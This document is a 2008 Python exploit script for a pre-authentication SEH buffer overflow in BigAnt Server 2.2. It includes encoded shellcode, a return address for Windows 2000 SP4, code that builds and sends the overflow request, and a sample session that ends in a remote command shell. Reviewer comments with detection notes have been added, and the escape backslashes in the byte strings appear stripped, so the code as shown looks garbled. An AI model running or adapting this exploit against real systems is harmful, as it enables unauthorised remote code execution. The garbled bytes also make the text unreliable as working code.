antserver_exploit.py.txt
Posted on 16 April 2008
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 192.168.1.195:6080
# bt ~ # nc -vv 192.168.1.195 4444
# 192.168.1.195: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:WINNTsystem32>
#
###############################################################################
#
# Review notes (defender / analyst reading of this listing):
# - Purpose as written: a Python 2 script that opens one TCP connection to a
#   BigAnt Server instance and sends a single oversized "GET" request line.
#   No authentication step precedes the send, which is what "PreAuth" in the
#   title refers to; the risk is therefore any exposure of the AntServer.exe
#   listener to untrusted networks.
# - Detection angle grounded in the code below: the only traffic is one
#   request whose request-target is a run of 0x90 bytes, the encoded payload
#   (698 bytes per the author's note), a short SEH-overwrite stub and 1225
#   'C' bytes, followed by a single space. Per the arithmetic on evilbuf that
#   is on the order of 2.2 KB, far larger than any legitimate request line
#   to this service would plausibly be — TODO confirm against real traffic.
# - The sample session above connects back with netcat to port 4444, which
#   suggests the payload opens a listening port on the victim — not provable
#   from the encoded bytes here; confirm before using 4444 as an indicator.
# - The string literals below are reproduced exactly as found on the page.
#
from socket import *          # star import: brings socket, AF_INET, SOCK_STREAM into scope
from optparse import OptionParser
import sys
print "[*********************************************************************]"
print "[*                                                                   *]"
print "[*      BigAnt Server PreAuth Remote SEH Overflow (0day)             *]"
print "[*                   Discovered and Coded By                          *]"
print "[*                      Matteo Memelli                                *]"
print "[*                        (ryujin)                                    *]"
print "[*          www.be4mind.com - www.gray-world.net                      *]"
print "[*                                                                   *]"
print "[*********************************************************************]"
# Command-line handling: both -H and -P are required; otherwise print usage and exit.
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string", action="store", dest="HOST", help="Target Host")
parser.add_option("-P", "--target_port", type="int", action="store", dest="PORT", help="Target Port")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
if not (HOST and PORT):
    parser.print_help()
    sys.exit()
# Tried with SEH/THREAD/PROCESS but server crashes anyway
# [*] x86/alpha_mixed succeeded, final size 698 SEH
# Encoded payload; adjacent literals are implicitly concatenated into one string.
shellcode = (
"x89xe1xdaxc0xd9x71xf4x58x50x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx43x5ax4ax4bx50x4dx4bx58x4ax59x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx47x54x47x54x4cx4b"
"x47x35x47x4cx4cx4bx43x4cx44x45x43x48x45x51x4a"
"x4fx4cx4bx50x4fx44x58x4cx4bx51x4fx51x30x45x51"
"x4ax4bx47x39x4cx4bx50x34x4cx4bx43x31x4ax4ex46"
"x51x49x50x4ax39x4ex4cx4dx54x49x50x42x54x44x47"
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4cx34x47"
"x4bx46x34x47x54x47x58x42x55x4bx55x4cx4bx51x4f"
"x46x44x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b"
"x4dx59x42x4cx47x54x45x4cx45x31x49x53x50x31x49"
"x4bx42x44x4cx4bx47x33x50x30x4cx4bx47x30x44x4c"
"x4cx4bx44x30x45x4cx4ex4dx4cx4bx47x30x43x38x51"
"x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx50x50x4bx4f"
"x4ex36x42x46x51x43x42x46x43x58x47x43x50x32x42"
"x48x42x57x43x43x50x32x51x4fx51x44x4bx4fx4ex30"
"x43x58x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx4e"
"x36x51x4fx4dx59x4dx35x45x36x4bx31x4ax4dx45x58"
"x43x32x50x55x42x4ax44x42x4bx4fx48x50x43x58x49"
"x49x45x59x4cx35x4ex4dx50x57x4bx4fx48x56x46x33"
"x46x33x50x53x50x53x46x33x47x33x46x33x51x53x46"
"x33x4bx4fx4ex30x45x36x42x48x42x31x51x4cx45x36"
"x50x53x4bx39x4dx31x4cx55x42x48x49x34x44x5ax44"
"x30x49x57x50x57x4bx4fx49x46x42x4ax42x30x46x31"
"x51x45x4bx4fx48x50x43x58x4ex44x4ex4dx46x4ex4b"
"x59x51x47x4bx4fx48x56x46x33x50x55x4bx4fx48x50"
"x42x48x4ax45x47x39x4bx36x47x39x51x47x4bx4fx4e"
"x36x46x30x46x34x46x34x50x55x4bx4fx4ex30x4ax33"
"x43x58x4ax47x44x39x49x56x44x39x46x37x4bx4fx49"
"x46x46x35x4bx4fx48x50x42x46x43x5ax42x44x45x36"
"x42x48x45x33x42x4dx4cx49x4dx35x42x4ax50x50x46"
"x39x47x59x48x4cx4dx59x4ax47x43x5ax51x54x4dx59"
"x4ax42x46x51x49x50x4cx33x4ex4ax4bx4ex51x52x46"
"x4dx4bx4ex50x42x46x4cx4dx43x4cx4dx42x5ax46x58"
"x4ex4bx4ex4bx4ex4bx42x48x43x42x4bx4ex4ex53x42"
"x36x4bx4fx43x45x51x54x4bx4fx48x56x51x4bx50x57"
"x46x32x46x31x50x51x50x51x43x5ax43x31x46x31x50"
"x51x51x45x50x51x4bx4fx4ex30x42x48x4ex4dx49x49"
"x43x35x48x4ex50x53x4bx4fx49x46x43x5ax4bx4fx4b"
"x4fx47x47x4bx4fx4ex30x4cx4bx51x47x4bx4cx4bx33"
"x48x44x45x34x4bx4fx49x46x46x32x4bx4fx4ex30x45"
"x38x4ax50x4cx4ax44x44x51x4fx51x43x4bx4fx48x56"
"x4bx4fx48x50x44x4ax41x41"
)
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
# evilbuf is the full request-target: 252 filler bytes, the payload, the
# SEH stub, 8 more filler bytes, a 5-byte stub and 1225 'C' bytes of padding.
evilbuf = 'x90'*252 + shellcode + 'xebx06x90x90' + \
'xDCxAExF8x77' + 'x90'*8 + 'xE9x82xFCxFFxFF' + \
'C'*1225
print '[+] Connecting to host...'
# NOTE(review): the connection below goes to a hard-coded address and port,
# not to the HOST/PORT values parsed from the command line; only the final
# status message uses the options. The socket is not wrapped in try/finally.
s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.1.195', 6080))
print '[+] Overflowing the buffer...'
# Single send of one request line; no response is read before closing.
s.send('GET ' + evilbuf + " ")
s.close()
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)